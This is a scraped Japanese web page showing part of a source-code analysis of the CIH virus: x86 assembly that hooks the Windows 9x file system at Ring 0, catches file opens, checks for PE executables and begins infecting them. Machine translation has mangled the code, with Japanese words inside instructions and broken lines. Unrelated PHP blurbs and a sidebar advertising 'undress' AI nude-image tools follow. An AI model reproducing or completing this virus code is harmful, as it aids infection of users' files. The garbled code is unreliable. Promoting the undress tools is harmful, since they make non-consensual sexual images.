jmp ExitRing0Init ;Exit Ring0レベル
;マージされたコードサイズ
CodeSizeOfMergeVirusCodeSection = offset $
;新しいIFSMgr_InstallFileSystemApiHook関数呼び出し
InstallFileSystemApiHook:
push ebx
call @4
@4:
pop ebx ; 現在のオフセットを取得します命令のアドレス
add ebx, FileSystemApiHook-@4 ; 差分とオフセットを加算した値は FileSystemApiHook のオフセットに等しい
push ebx
int 20h ; Vxd を呼び出して FileSystemApiHook を指すフックを削除する
IFSMgr_RemoveFileSystemApiHook = $
dd 00 0068h ;eax、ecx、edx、および flags レジスタを使用します
pop eax
; 元の IFSMgr_InstallFileSystemApiHook 関数を呼び出して FileSystemApiHook フックに接続します
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
Pop ECX
プッシュeax
Push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax;OldFileSystemApiHook アドレスを調整
pop eax
pop ebx
ret
OldInstallFileSystemApiHook dd;元の InstallFileSystemApiHook 呼び出しアドレス
;IFSMgr_FileSystemHook callEntry
FileSystemApiHook:
@3 = FileSystemApiHook
push ad ;Save register
call @5
@5:
pop esi, offset ;esi は現在のコマンドのオフセット
add esi, VirusGameDataStartAddress - @5 ;esi は FileSystemApiHook のオフセットです
;;VirusGameDataStartAddress のオフセットの差は、VirusGameDataStartAddress のオフセットに等しいです
;「ビジー」フラグをテストすると、「ビジー」は pIFSFunc
テストバイト ptr (OnBusy- @6)[esi], 01h
jnz pIFSFunc
;ファイルが開かれていない場合はprevhookへ
lea ebx, [esp+20h+04h+04h] ;ebxはFunctionNumのアドレス
;呼び出し形式ファイルシステムのフックは次のとおりです
;FileSystemApiHookFunction(pIFSFunc FS DFnAddr , int FunctionNum, int Drive,
;int ResourceFlags, int CodePage, pioreq pir)
;この呼び出しがファイルを開くためのものであるかどうかを判断し、そうでない場合はジャンプします前のファイルへフック
cmp dword ptr [ebx], 00000024h
jne prevhook
inc byte ptr (OnBusy-@6)[esi] ; OnBusy フラグを「busy」に設定します
;ファイルパスで指定されたドライブ文字を指定して、そのドライブ名をFileNameBufferに入れます
;ドライブ文字が03hの場合は、そのドライブがCドライブであることを意味します
mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6 ;esi Points to FileNameBuffer
push esi ;Save
mov al, [ebx+04h] ;ebx+ 4 はディスク番号のアドレス
その場合は CallUniToBCSPath
cmp al に転送します。 , 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi] , eax ; 「char * pBCSPath, ParsedPath * pUniPath,
; unsigned int maxLength, int charSet」の形に処理)
CallUniToBCSPath:
Push 00000000h ; 文字セット
Push FileNameBufferSize ; 文字長
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
Push eax ;Uni 文字の先頭アドレス
puシエシ; BCS 文字の先頭アドレス
int 20h ;call UniToBCSPath
UniToBCSPath = $
dd 00400041h call id
add esp, 04h*04h
;ファイルが EXE ファイルかどうかを判断する
cmp [esi+eax-04h], 。」
jne DisableOnBusy
IF DEBUG
;以下の情報はデバッグ用です
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy ENDIF int 20h ; call IFSMgr_Ring0_FileIO Function
IFSMgr_Ring0_FileIO = $
dd 00400032h ;電話番号
jc DisableOnBusy
push ecx
;Get IFSMgr_Ring0_FileIO address
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]
;ファイルが読み取り専用かどうかを判断し、そうであれば変更しますファイル属性、それ以外の場合は OpenFile に移動します
Test cl, 01h
jz OpenFile mov ax, 4301h
OpenFile:
xor eax , eax
mov ah, 0d5h
xor ecx, ecx; ファイルを開く FileIO の関数
XCHG EBX, Eax; ファイルハンドルを EBX に保存する; ファイル属性を復元するかどうか (書き込み属性がある場合は復元する必要はありません)
Pop ecx
Pushf
test cl, 01h
jz ispileok
; mov ax, 4301h
call edi ;ファイル属性を復元する
;ファイルが正常に開かれたかどうか、DisableOnBusy
IsOpenFileOK:
popf
jc DisableOnBusy
;ファイルは正常に開かれました
push esi ;スタック上の最初のアドレス
pushf ;CF = 0, save flag bit
add esi, DataBuffer-@7; esi はデータ領域の最初のアドレスを指す
xor eax, eax
mov ah, 0d6h ;IFSMgr_Ring0_FileIO 読み込みファイル関数番号(R0_READFILE)
;ウイルスコードの長さを最小限に抑えるため、eaxをebpに保存
mov ebp, eax
push 00000004h ;4バイト読み込む
ポップecx
push ; グラフィックファイルヘッダのPEマークと感染マークを取得
ediにファイルを読み込む
そうであればさらに判定感染しているかどうかを判断します
; WinZip 自己解凍ファイルであるかどうかを判断します。感染している場合は、Self-Extractor に感染しません *
cmp dword ptr [esi], 00455000h; PE ファイルであるかどうかを判断します。 "PE/0/0")
jne CloseFile; そうでない場合は、ファイルを閉じます
; PE ファイルであり、感染していない場合は、ファイルの感染を開始します
push ebx; ファイルハンドルを保存します
push 00h
;ウイルス感染マークを設定します
push 01h;マークサイズ
push edx;edxはPEファイルヘッダを指します Offset 00h
push edi ;ediはIFSMgr_Ring0_FileIOのアドレスです
mov dr1, esp ; mov cl, SizeOfImageHeader ;読むために; 2バイトを読み込む場合
add edx, 07h; PEファイルヘッダー+07hはNumberOfSections(ブロック数)
call edi; read NumberOfSections(ブロック数) to esi
lea eax, (AddressOfEntryPoint-@8)[edx]
Push eax ;ファイルポインタ
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ;バッファアドレス
;edxの値をファイルウイルスコードブロックテーブルの先頭に置く
movzx eax, word ptr( SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h] ;edxはウイルスコードブロックテーブルのオフセット
;ウイルスコードブロックテーブルのサイズを取得
mov al, SizeOfScetionTable;各ブロックtable アイテムのサイズ
mov cl, (NumberOfSections-@8)[esi]
mul cl ;各ブロックテーブルアイテムにブロック数を乗算したものがブロックテーブルのサイズに等しい
; code block table
lea esi, (StartOfSectionTable -@8)[esi] ;esi はブロックテーブル(ウイルス動的データ領域内)の先頭アドレスを指します
上記はウイルスプログラムのソースコード例解析の内容です-CIH ウイルス [3]。その他の関連コンテンツについては、PHP 中国語 Web サイト (www.php.cn) に注目してください。

PHPは、電子商取引、コンテンツ管理システム、API開発で広く使用されています。 1)eコマース:ショッピングカート機能と支払い処理に使用。 2)コンテンツ管理システム:動的コンテンツの生成とユーザー管理に使用されます。 3)API開発:RESTFUL API開発とAPIセキュリティに使用されます。パフォーマンスの最適化とベストプラクティスを通じて、PHPアプリケーションの効率と保守性が向上します。

PHPにより、インタラクティブなWebコンテンツを簡単に作成できます。 1)HTMLを埋め込んでコンテンツを動的に生成し、ユーザー入力またはデータベースデータに基づいてリアルタイムで表示します。 2)プロセスフォームの提出と動的出力を生成して、XSSを防ぐためにHTMLSPECIALCHARSを使用していることを確認します。 3)MySQLを使用してユーザー登録システムを作成し、Password_HashおよびPreprocessingステートメントを使用してセキュリティを強化します。これらの手法を習得すると、Web開発の効率が向上します。

PHPとPythonにはそれぞれ独自の利点があり、プロジェクトの要件に従って選択します。 1.PHPは、特にWebサイトの迅速な開発とメンテナンスに適しています。 2。Pythonは、データサイエンス、機械学習、人工知能に適しており、簡潔な構文を備えており、初心者に適しています。

PHPは依然として動的であり、現代のプログラミングの分野で重要な位置を占めています。 1)PHPのシンプルさと強力なコミュニティサポートにより、Web開発で広く使用されています。 2)その柔軟性と安定性により、Webフォーム、データベース操作、ファイル処理の処理において顕著になります。 3)PHPは、初心者や経験豊富な開発者に適した、常に進化し、最適化しています。

PHPは、現代のWeb開発、特にコンテンツ管理とeコマースプラットフォームで依然として重要です。 1)PHPには、LaravelやSymfonyなどの豊富なエコシステムと強力なフレームワークサポートがあります。 2)パフォーマンスの最適化は、Opcacheとnginxを通じて達成できます。 3)PHP8.0は、パフォーマンスを改善するためにJITコンパイラを導入します。 4)クラウドネイティブアプリケーションは、DockerおよびKubernetesを介して展開され、柔軟性とスケーラビリティを向上させます。

PHPは、特に迅速な開発や動的なコンテンツの処理に適していますが、データサイエンスとエンタープライズレベルのアプリケーションには良くありません。 Pythonと比較して、PHPはWeb開発においてより多くの利点がありますが、データサイエンスの分野ではPythonほど良くありません。 Javaと比較して、PHPはエンタープライズレベルのアプリケーションでより悪化しますが、Web開発により柔軟性があります。 JavaScriptと比較して、PHPはバックエンド開発により簡潔ですが、フロントエンド開発のJavaScriptほど良くありません。

PHPとPythonにはそれぞれ独自の利点があり、さまざまなシナリオに適しています。 1.PHPはWeb開発に適しており、組み込みのWebサーバーとRich Functionライブラリを提供します。 2。Pythonは、簡潔な構文と強力な標準ライブラリを備えたデータサイエンスと機械学習に適しています。選択するときは、プロジェクトの要件に基づいて決定する必要があります。

PHPは、サーバー側で広く使用されているスクリプト言語で、特にWeb開発に適しています。 1.PHPは、HTMLを埋め込み、HTTP要求と応答を処理し、さまざまなデータベースをサポートできます。 2.PHPは、ダイナミックWebコンテンツ、プロセスフォームデータ、アクセスデータベースなどを生成するために使用され、強力なコミュニティサポートとオープンソースリソースを備えています。 3。PHPは解釈された言語であり、実行プロセスには語彙分析、文法分析、編集、実行が含まれます。 4.PHPは、ユーザー登録システムなどの高度なアプリケーションについてMySQLと組み合わせることができます。 5。PHPをデバッグするときは、error_reporting()やvar_dump()などの関数を使用できます。 6. PHPコードを最適化して、キャッシュメカニズムを使用し、データベースクエリを最適化し、組み込み関数を使用します。 7


ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

AI Hentai Generator
AIヘンタイを無料で生成します。

人気の記事

ホットツール

SublimeText3 Linux 新バージョン
SublimeText3 Linux 最新バージョン

Dreamweaver Mac版
ビジュアル Web 開発ツール

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

mPDF
mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。

VSCode Windows 64 ビットのダウンロード
Microsoft によって発売された無料で強力な IDE エディター
